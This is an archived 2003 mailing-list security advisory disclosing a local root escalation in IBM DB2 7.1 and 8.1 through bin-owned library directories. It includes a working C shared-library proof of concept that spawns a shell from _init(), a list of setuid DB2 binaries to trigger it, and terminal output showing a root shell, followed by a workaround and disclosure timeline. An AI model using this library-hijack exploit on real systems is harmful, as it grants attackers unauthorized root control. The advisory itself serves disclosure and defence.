| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.44.0308051609320.17963-100000@hades2.concha.upv.es>
Date: Tue, 5 Aug 2003 16:11:41 +0200 (CEST)
From: pask@...c.upv.es
To: full-disclosure@...ts.netsys.com
Cc: bugtraq@...urityfocus.com
Subject: Slight privilege elevation from bin to root in IBM DB2 7.1 - 8.1
all binaries
Title: Local Vulnerability in IBM DB2 7.1 - 8.1 all binaries
Date: 27-07-2003
Platform: Only tested in Linux but can be exported to others.
Only versions 7.1 and Enterprise Server Edition v8.1 were checked
but could affect other versions.
Impact: Slight privilege elevation from bin to root.
Author: Juan Manuel Pascual Escriba <pask@...net.edu>
Status: Vendor contacted details below.
PROBLEM SUMMARY:
DB2 Universal Data Base Enterprise Server Edition versions 7.1 and 8.1 are installed
in /home directories and put its libraries in:
/usr/IBMdb2/V7.1/lib in 7.1 Version
/opt/IBM/db2/V8.1/lib in 8.1 Version
In both versions the lib directory is owned by bin.bin. If some local or remote attacker
could compromise bin account, it would be possible to elevate privileges to root inmediatly
via a so library creation.
DESCRIPTION
db2 libraries are installed owned by bin in my default installation in 7.1 & 8.1 versions
[pask@...oniet home]$ ls -alc /usr/IBMdb2/V7.1
...
drwxr-xr-x 2 bin bin 4096 Jun 21 2002 java12
drwxr-xr-x 2 bin bin 4096 Jul 30 19:54 lib
drwxr-xr-x 2 bin bin 4096 Jun 21 2002 map
...
[pask@...oniet home]$ ls -alc /opt/IBM/db2/V8.1/
...
drwxr-xr-x 2 bin bin 4096 Dec 11 2002 java
drwxr-xr-x 2 bin bin 4096 Dec 11 2002 lib
drwxr-xr-x 30 bin bin 4096 Dec 11 2002 license
drwxr-xr-x 2 bin bin 4096 Dec 11 2002 map
...
For bin user is too easy to create a so.lib, something like
#include <stdio.h>
#include <string.h>
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
system("/bin/bash");
printf("Saliendo del Init()\n");
}
compiling in /usr/IBMdb2/V7.1/lib/libdl.so.2 and exec some root-setuided binary, for example
-r-s--x--x 1 root db2asgrp 15557 Jul 31 00:42 db2cacpy
-r-sr-s--x 1 root db2asgrp 17562 Jun 21 2002 db2dari
-r-s--x--x 1 root db2asgrp 68291 Jun 21 2002 db2genp
-r-sr-x--x 1 root db2asgrp 97722 Jun 21 2002 db2licd
-r-sr-s--x 1 root db2asgrp 23063 Jul 29 03:15 db2start
-r-sr-s--x 1 root db2asgrp 24396 Jun 21 2002 db2stop
-r-sr-s--- 1 root db2asgrp 50879 Jun 21 2002 db2sysc
-r-sr-s--x 1 root db2asgrp 81925 Jun 21 2002 db2udf
-r-sr-s--x 1 root db2asgrp 16940 Jun 21 2002 db2udfi
[bin@...oniet adm]$ /home/db2as/sqllib/adm/db2cacpy
/home/db2as/sqllib/adm/db2cacpy: /usr/IBMdb2/V7.1/lib/libdl.so.2: no version information available (required by /usr/IBMdb2/V7.1/lib/libdb2.so.1)
/home/db2as/sqllib/adm/db2cacpy: /usr/IBMdb2/V7.1/lib/libdl.so.2: no version information available (required by /usr/IBMdb2/V7.1/lib/libdb2.so.1)
en el _init()
Con PID=10477 y EUID=0
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@...oniet adm]# id
uid=0(root) gid=0(root) groups=1(bin)
[root@...oniet adm]# exit
exit
Saliendo del Init()
[bin@...oniet adm]$
For 8.1 installation, the same strategy. I create a /opt/IBM/db2/V8.1/lib/libdl.so.2 and exec some of this files (exists more root-setuided files in other directories)
-r-s--x--x 1 root db2grp1 70445 Dec 11 2002 db2cacpy
-r-sr-s--x 1 root db2grp1 78272 Dec 11 2002 db2fmp
-r-sr-s--x 1 root db2grp1 75101 Dec 11 2002 db2fmpterm
-r-s--x--x 1 root db2grp1 101419 Dec 11 2002 db2genp
-r-sr-x--x 1 root db2grp1 180378 Dec 11 2002 db2licd
-r-sr-s--x 1 root db2grp1 38044 Dec 11 2002 db2start
-r-sr-s--x 1 root db2grp1 84713 Dec 11 2002 db2stop
[bin@...oniet adm]$ ./db2start
./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2e.so.1)
./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2e.so.1)
./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2osse.so.1)
./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2osse.so.1)
en el _init()
Con PID=10540
Con EUID=0
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@...oniet adm]# id
uid=0(root) gid=0(root) groups=1(bin)
[root@...oniet adm]# exit
exit
Saliendo del Init()
SQL1042C An unexpected system error occurred. SQLSTATE=58004
IMPACT:
bin user can gain root privileges through db2 installation
EXPLOIT
commented above.
WORKAROUND
chown to root the db2 lib directory and libraries
STATUS
This bug was reported to security-alert@...tin.ibm.com on July 27.
After that on July 29 IBM sec staff forwards as bcc my emails to with db2
security team. At 5th August i have'nt any idea about db2 sec team emails
or how to contact with it.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@...net.edu
http://concepcion.upv.es/~pask/advisories/2003/IBM%20DB2%20so-libraries
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists